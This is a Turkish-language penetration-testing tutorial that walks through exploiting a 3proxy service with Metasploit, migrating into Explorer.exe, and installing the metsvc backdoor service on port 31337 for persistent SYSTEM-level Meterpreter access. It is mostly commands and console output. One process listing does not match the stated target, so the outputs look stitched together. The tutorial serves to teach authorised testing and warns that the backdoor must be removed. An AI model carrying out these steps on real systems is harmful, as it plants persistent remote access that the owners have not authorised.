MSF Meterpreter Backdoor

Estimated read time 5 min read

Meterpreter metsvc

Hedef sisteme giriş yaptıktan sonra, kalıcılık sağlamanın bir yolu da metsvc servisini kullanmaktır. Bu servis sayesinde istediğiniz zaman tekrar Meterpreter oturumu açabilirsiniz. metsvc hakkında detaylı bilgiyi bağlantıyı kullanarak inceleyebilirsiniz.

metsvc hakkında bilmeniz gereken önemli bir noktayı vurgulayalım. Bu servisi yerleştirdiğiniz bilgisayarın ilgili portunu bulan herkes bu arka kapıyı kullanabilir. Pentest işlemleri esnasında kullandıktan sonra iptal etmelisiniz yoksa sistemi, art niyetli kişilere açık duruma getirmiş olursunuz. Bu da sistem sahiplerinin hiç hoşuna gitmeyebilir.

Öncelikle sistemde, bulduğunuz bir açıklıkla ilgili modülü kullanarak meterpreter oturumu açalım.

msf exploit(3proxy) > exploit

[*] Started reverse handler
[*] Trying target Windows XP SP2 - English...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1983)

ps komutuyla Explorer.exe programının PID numarasını bulalım ve migrate komutuyla bu PID numaralı programa geçiş yapalım.

meterpreter > ps

Process list
============

  PID  Name         Path
  ---  ----         ----
  132  ctfmon.exe      C:\WINDOWS\system32\ctfmon.exe
  176  svchost.exe     C:\WINDOWS\system32\svchost.exe
  440  VMwareService.exe  C:\Program Files\VMware\VMware Tools\VMwareService.exe
  632  Explorer.EXE     C:\WINDOWS\Explorer.EXE
  796  smss.exe       \SystemRoot\System32\smss.exe
  836  VMwareTray.exe    C:\Program Files\VMware\VMware Tools\VMwareTray.exe
  844  VMwareUser.exe    C:\Program Files\VMware\VMware Tools\VMwareUser.exe
  884  csrss.exe      \??\C:\WINDOWS\system32\csrss.exe
  908  winlogon.exe     \??\C:\WINDOWS\system32\winlogon.exe
  952  services.exe     C:\WINDOWS\system32\services.exe
  964  lsass.exe      C:\WINDOWS\system32\lsass.exe
  1120 vmacthlp.exe     C:\Program Files\VMware\VMware Tools\vmacthlp.exe
  1136 svchost.exe     C:\WINDOWS\system32\svchost.exe
  1236 svchost.exe     C:\WINDOWS\system32\svchost.exe
  1560 alg.exe       C:\WINDOWS\System32\alg.exe
  1568 WZCSLDR2.exe     C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe
  1596 jusched.exe     C:\Program Files\Java\jre6\bin\jusched.exe
  1656 msmsgs.exe      C:\Program Files\Messenger\msmsgs.exe
  1748 spoolsv.exe     C:\WINDOWS\system32\spoolsv.exe
  1928 jqs.exe       C:\Program Files\Java\jre6\bin\jqs.exe
  2028 snmp.exe       C:\WINDOWS\System32\snmp.exe
  2840 3proxy.exe      C:\3proxy\bin\3proxy.exe
  3000 mmc.exe       C:\WINDOWS\system32\mmc.exe

meterpreter > migrate 632
[*] Migrating to 632...
[*] Migration completed successfully.

metsvc modülünü kullanmadan önce yardımı görüntüleyelim ve bize hangi olanakları sağladığını görelim.

meterpreter > run metsvc -h
[*]
OPTIONS:

  -A    Automatically start a matching multi/handler to connect to the service
  -h    This help menu
  -r    Uninstall an existing Meterpreter service (files must be deleted manually)

meterpreter >

metsvc, normalde bize geri bağlantı da sağlayan bir programdır ancak biz zaten Meterpreter oturumu açtığımız için geri bağlantıya şimdilik ihtiyacımız yok. Sadece programı çalıştıralım.

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
[*]   * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

meterpreter >

metsvc başladı ve artık bağlanmak için bekliyor. Şimdi bu servisle nasıl haberleşeceğimizi görelim.

Hedef sistemde dinleme durumundaki metsvc ile haberleşmek için windows/metsvc_bind_tcp payload modülünü kullanacağız. Modülü, aşağıdaki örnekte olduğu gibi aktif hale getirelim ve gerekli PORT ayarlarını yapalım.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(handler) > show options

Module options:

  Name Current Setting Required Description
  ---- --------------- -------- -----------


Payload options (windows/metsvc_bind_tcp):

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  EXITFUNC thread      yes    Exit technique: seh, thread, process
  LPORT   31337      yes    The local port
  RHOST   192.168.1.104  no    The target address


Exploit target:

  Id Name
  -- ----
  0  Wildcard Target


msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 2 opened (192.168.1.101:60840 -> 192.168.1.104:31337)

Gördüğünüz gibi session 2 otomatik olarak açıldı. Şimdi, metsvc servisinin hedef bilgisayarda hangi PID numarasıyla çalıştığına bakalım.

meterpreter > ps

Process list
============

  PID  Name        Path                         
  ---  ----        ----                         
  140  smss.exe      \SystemRoot\System32\smss.exe             
  168  csrss.exe     \??\C:\WINNT\system32\csrss.exe            
  188  winlogon.exe    \??\C:WINNT\system32\winlogon.exe          
  216  services.exe    C:\WINNT\system32\services.exe            
  228  lsass.exe     C:\WINNT\system32\lsass.exe              
  380  svchost.exe    C:\WINNT\system32\svchost.exe             
  408  spoolsv.exe    C:\WINNT\system32\spoolsv.exe             
  444  svchost.exe    C:\WINNT\System32\svchost.exe             
  480  regsvc.exe     C:\WINNT\system32\regsvc.exe             
  500  MSTask.exe     C:\WINNT\system32\MSTask.exe             
  528  VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe
  564  metsvc.exe     c:\WINNT\my\metsvc.exe                
  588  WinMgmt.exe    C:\WINNT\System32\WBEM\WinMgmt.exe          
  676  cmd.exe      C:\WINNT\System32\cmd.exe               
  724  cmd.exe      C:\WINNT\System32\cmd.exe               
  764  mmc.exe      C:\WINNT\system32\mmc.exe               
  816  metsvc-server.exe c:\WINNT\my\metsvc-server.exe             
  888  VMwareTray.exe   C:\Program Files\VMware\VMware Tools\VMwareTray.exe  
  896  VMwareUser.exe   C:\Program Files\VMware\VMware Tools\VMwareUser.exe  
  940  firefox.exe    C:\Program Files\Mozilla Firefox\firefox.exe     
  972  TPAutoConnSvc.exe C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
  1000 Explorer.exe    C:\WINNT\Explorer.exe                 
  1088 TPAutoConnect.exe C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Çıktıdan görülebileceği gibi, metsvc programı, 564 PID numarasıyla çalışmaktadır. Artık istediğiniz zaman, hedef bilgisayarda dinleme yapan programa, windows/metsvc_bind_tcp payload modülünü kullanarak bağlanabiliriz.

Tekrar hatırlatmak gerekirse, güvenlik testi işlemleriniz bittiğinde metsvc programını sistemden silmelisiniz.